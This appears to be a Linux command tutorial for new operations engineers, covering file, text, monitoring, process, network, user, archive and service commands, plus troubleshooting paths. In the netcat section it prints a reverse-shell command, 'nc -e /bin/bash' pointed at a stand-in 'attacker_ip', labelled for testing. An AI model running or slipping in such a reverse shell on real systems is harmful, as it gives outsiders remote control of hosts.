30 Essential Linux Commands Every New Ops Engineer Must Know

1. File and Directory Operations

ls lists directory contents. Common options: ls -l – long format with permissions, size, timestamps. ls -a – include hidden files. ls -lh – human‑readable sizes. ls -lt – sort by modification time.

cd changes the working directory. Useful shortcuts: cd .. – parent directory. cd ~ – home directory. cd - – previous directory.

pwd prints the current directory. Use pwd -P to resolve symbolic links.

mkdir creates directories. -p creates parent directories as needed and does not error if the target already exists. Example:

# create a nested directory tree
mkdir -p /data/{app1,app2,app3}/logs

rm removes files or directories. Important flags: -f – force, ignore non‑existent files. -r – recursive, required for directories. -i – interactive confirmation.

Never run rm -rf / on a production host; always verify the target with ls first.

cp copies files. Typical usage:

cp source.txt /dest/

cp -p source.txt /dest/

– preserve mode, ownership, timestamps. cp -r /src/dir /dest/ – recursive copy of a directory. cp -u source/*.conf /dest/ – copy only when the source is newer.

mv moves or renames files. A typical log‑rotation pattern is to rename the current log file and then send a SIGHUP to the daemon so it reopens the file:

# rotate an nginx log
mv /var/log/nginx/access.log /var/log/nginx/access.log.$(date +%Y%m%d)
kill -HUP $(cat /var/run/nginx.pid)

2. Text Processing and Viewing

cat displays a file. Useful options: -n – number all output lines. -A – show non‑printable characters.

For large files use less or tail -f instead of cat to avoid terminal slowdown.

less provides paginated, searchable view. Common shortcuts: /pattern – search forward. n – repeat search. g – go to beginning. G – go to end. q – quit. F or less +F – follow a growing file (like tail -f).

head shows the first N lines (default 10). Example:

# show first 20 lines of a log
head -n 20 /var/log/messages

tail shows the last N lines and can follow updates:

# follow a log in real time
tail -f /var/log/nginx/error.log

grep searches text. Frequently used options: -i – case‑insensitive. -n – show line numbers. -C 3 – show 3 lines of context. -r – recursive directory search. -E – extended regular expressions.

When scanning very large log files, add --binary-files=without-match to skip binary data.

awk processes column‑based data. Example to count requests per IP from an nginx access log:

awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20

sed performs stream editing. A safe in‑place edit pattern is:

# preview the substitution
sed 's/error/ERROR/g' /var/log/app.log | head -20
# apply after verification
sed -i.bak 's/error/ERROR/g' /var/log/app.log

wc counts lines, words, bytes. Combined with find it can count total lines of source code:

find /project -name "*.py" -exec cat {} + | wc -l

sort orders text. Common flags: -n – numeric sort. -r – reverse. -k2 – sort by second field. -u – unique.

uniq removes adjacent duplicate lines; it is usually used after sort:

sort file.txt | uniq -c

3. System Information and Monitoring

top shows a live view of processes. Interactive keys: M – sort by memory usage. P – sort by CPU usage. k – kill a process (enter PID). r – renice a process. q – quit.

Batch mode for scripting: top -b -n 1.

htop is a more user‑friendly alternative with colour coding and a tree view. Use F5 for the tree, F6 to change the sort column, and F9 to kill a process.

vmstat reports virtual‑memory statistics. Key fields and interpretation: r – run‑queue length; values > 4 × CPU cores indicate CPU starvation. wa – I/O wait percentage; > 30 % suggests an I/O bottleneck. si / so – swap in/out; non‑zero values mean physical memory pressure.

iostat shows disk I/O. In extended mode ( -x) watch: await – average I/O latency; > 10 ms is a warning. %util – device utilisation; values near 100 % indicate saturation.

netstat and ss list network sockets. ss -tlnp is faster than netstat -tlnp and shows listening TCP ports with owning processes.

df reports filesystem space. Pay attention to partitions with Use% > 80 %. df -i shows inode usage.

du measures directory size. Typical usage to locate the biggest consumers:

# top‑level usage
du -sh /* 2>/dev/null | sort -h
# drill down
du -sh /var/* 2>/dev/null | sort -h

free displays memory usage. The available column is a more accurate indicator of free memory than free because the kernel can reclaim cache.

uptime shows load average. Interpretation:

Load < CPU cores → normal.

Load > 2 × CPU cores → high.

Load > 4 × CPU cores → severe overload.

4. Process Management

ps snapshots processes. Two common formats: ps aux – BSD style, includes %CPU and %MEM. ps -ef – System V style, shows full command line.

Sort by resource usage:

# top CPU consumers
ps aux --sort=-%cpu | head -10
# top memory consumers
ps aux --sort=-%mem | head -10

pkill and kill send signals. Examples: pkill -9 nginx – force‑kill all nginx processes. kill -HUP $(cat /var/run/nginx.pid) – graceful reload.

Signal meanings (referenced in the article): SIGTERM (15) – graceful termination; SIGKILL (9) – immediate kill; SIGHUP (1) – reload configuration; SIGUSR1/2 – user‑defined.

killall kills by name; behaviour differs across Linux, Solaris, macOS – use with care.

nohup runs a command immune to hangup signals. Typical pattern: nohup ./backup.sh > backup.log 2>&1 & jobs , bg , fg control shell job state. Example workflow:

# start a long task
./backup.sh
# suspend with Ctrl+Z
bg %1   # continue in background
# later bring it to foreground
fg %1

5. Network Diagnosis

ping checks reachability. Useful options: -c N – send N packets. -i SEC – interval between packets. -s SIZE – packet size.

traceroute (or tracert on Windows) shows the path to a host. Use -I for ICMP or -T for TCP SYN probes.

nslookup and dig query DNS. Example to retrieve all records for a domain:

# dig with trace shows the full resolution chain
 dig +trace example.com
# query specific types
 dig MX example.com
 dig TXT example.com

nc (netcat) is a Swiss‑army knife for TCP/UDP. Common uses:

Port check: nc -zv 192.168.1.100 22 File transfer: nc -l 1234 > received.bin on the receiver and cat file.bin | nc host 1234 on the sender.

Reverse shell (for testing only): nc -lvp 4444 on attacker, nc -e /bin/bash attacker_ip 4444 on target.

curl is an HTTP client. Frequently used flags: -I – fetch headers only. -L – follow redirects. -d – POST data. -H "Header: value" – add custom header. -w "%{time_total}" – print total request time. -s – silent mode.

Example measuring response time:

curl -s -o /dev/null -w "%{time_total}
" https://www.example.com

wget downloads files. Key options: -c – continue incomplete download. -b – background download. -O filename – save as specific name. -r -l 2 – recursive download, depth 2 (use with caution).

ip replaces the older ifconfig. Example tasks:

# show interfaces
ip addr
# bring eth0 up
ip link set eth0 up
# assign an address
ip addr add 192.168.1.100/24 dev eth0
# default gateway
ip route add default via 192.168.1.1

6. User and Permission Management

useradd creates a new account. Typical safe pattern:

# create a regular user with a home directory and bash shell
useradd -m -s /bin/bash alice

usermod modifies an existing account. Example to add the user to the sudo group without overwriting other groups: usermod -aG sudo alice userdel removes an account. Use -r to delete the home directory as well. The article warns about a dangerous one‑liner that deletes all non‑system users; avoid it.

groupadd creates a group, optionally with a specific GID: groupadd -g 1500 developers chmod changes file mode bits. Numeric notation (e.g., 755) and symbolic notation ( u+x) are both supported. Special bits: u+s – setuid. g+s – setgid. +t – sticky bit (commonly on /tmp).

Recursive permission change while preserving directories:

# set files to 644 and directories to 755
find /var/www -type f -exec chmod 644 {} +
find /var/www -type d -exec chmod 755 {} +

chown changes ownership. Recursive example: chown -R www-data:www-data /var/www sudo runs commands as another user (usually root). To see what a user may run, use sudo -l. A typical /etc/sudoers entry to allow password‑less service control:

alice ALL=(ALL) NOPASSWD: /bin/systemctl restart nginx

7. Compression, Archiving, and Extraction

tar creates and extracts archives. Frequently used flags: -c – create. -x – extract. -f – specify file name. -z – gzip compression. -j – bzip2 compression. -J – xz compression. -v – verbose. --exclude='pattern' – omit files.

Example: create a gzipped archive of /etc while excluding backup files:

tar -czf etc.tar.gz /etc --exclude='*.bak' --exclude='cache/*'

Extract preserving permissions: tar -xpf etc.tar.gz -C /tmp zip and unzip handle .zip files. Example to create a recursive archive while excluding logs: zip -r archive.zip /data -x "*.log" "cache/*" Decrypt a password‑protected zip: unzip -P secret archive.zip gzip / gunzip compress a single file. Use -k to keep the original: gzip -9 -k largefile.bin bzip2 offers higher compression at the cost of speed. Use -9 for maximum compression.

xz provides the highest compression ratio but is the slowest. Example: xz -9 -k data.tar The article includes a comparative table (converted here to a list):

gzip – fast, moderate compression, .gz.

bzip2 – medium speed, higher compression, .bz2.

xz – slow, highest compression, .xz.

zip – fast, moderate compression, .zip.

8. Service and Log Management

systemctl controls systemd services. Core actions:

systemctl start nginx

systemctl stop nginx

systemctl restart nginx

systemctl reload nginx

– reload config without dropping connections. systemctl enable nginx – start on boot. systemctl status nginx – view state and recent logs.

journalctl reads the systemd journal. Useful filters: journalctl -u nginx – logs for a unit. journalctl -b – logs from the current boot. journalctl -p err – only error‑level entries. journalctl --since "2024-01-01" --until "2024-01-02" – time range. journalctl --vacuum-size=500M – delete old entries to keep 500 MiB.

logrotate rotates log files to prevent disks from filling. A typical nginx logrotate snippet (converted to a list) includes: daily – rotate each day. rotate 14 – keep two weeks of logs. compress and delaycompress – compress old logs but keep the most recent uncompressed. missingok – ignore missing files. postrotate … kill -USR1 $(cat /var/run/nginx.pid) – tell nginx to reopen logs after rotation.

Test a configuration without applying changes: logrotate -d /etc/logrotate.conf. Force rotation: logrotate -f /etc/logrotate.d/nginx.

9. Practical Troubleshooting Path

High CPU load : uptime → top -b -n 1 → ps aux --sort=-%cpu | head -10 → investigate the offending process with strace -p PID or lsof -p PID.

Memory shortage : free -h → ps aux --sort=-%mem | head -10 → check OOM killer messages via dmesg | grep -i "out of memory" or journalctl -p crit.

Disk space exhaustion : df -h → du -sh /* 2>/dev/null | sort -h → locate large files with find / -size +100M -type f → rotate or delete old logs, clean package caches ( apt-get clean or yum clean all).

Network issues : ping -c 4 8.8.8.8 → traceroute -T target → ss -tlnp to verify listening ports → curl -I http://service to test HTTP response.

Service verification : systemctl status SERVICE → journalctl -u SERVICE -n 20 → if failed, use systemctl restart SERVICE and re‑check logs.

Log keyword analysis :

grep -i error /var/log/messages | awk '{print $5}' | sort | uniq -c

→ count occurrences per error code; for web traffic,

awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20

.

10. Conclusion

The 30 commands covered span four major operational scenarios: file handling, text processing, system monitoring, and network diagnostics, plus user/permission management, compression, and service administration. Mastering these tools enables rapid diagnosis and resolution of production incidents without relying on external monitoring dashboards.

High‑priority commands for day‑to‑day ops: ps aux, top, htop, ss, netstat, grep, awk, sed, df, du, free, journalctl, systemctl.

Medium‑priority commands : ping, traceroute, dig, curl, wget, tar, gzip, chmod, chown, useradd.

Best‑practice recommendations (derived from the article):

Always preview destructive actions with ls or cat before running rm or mv.

Prefer mv + SIGHUP over cp + rm when rotating log files to avoid data loss.

Use systemctl status and journalctl -u as the first source of truth when a service misbehaves.

Leverage pipelines ( |) to combine tools (e.g., grep … | awk … | sort -nr) instead of writing ad‑hoc scripts.

Automate repetitive checks in shell scripts and schedule them with cron or systemd timers.

Back up configuration files before editing; test sed or awk changes without -i first.

Keep log rotation configured to prevent disk‑full emergencies.

Regular practice in a non‑production environment will turn these commands into muscle memory, allowing you to respond to incidents quickly and safely.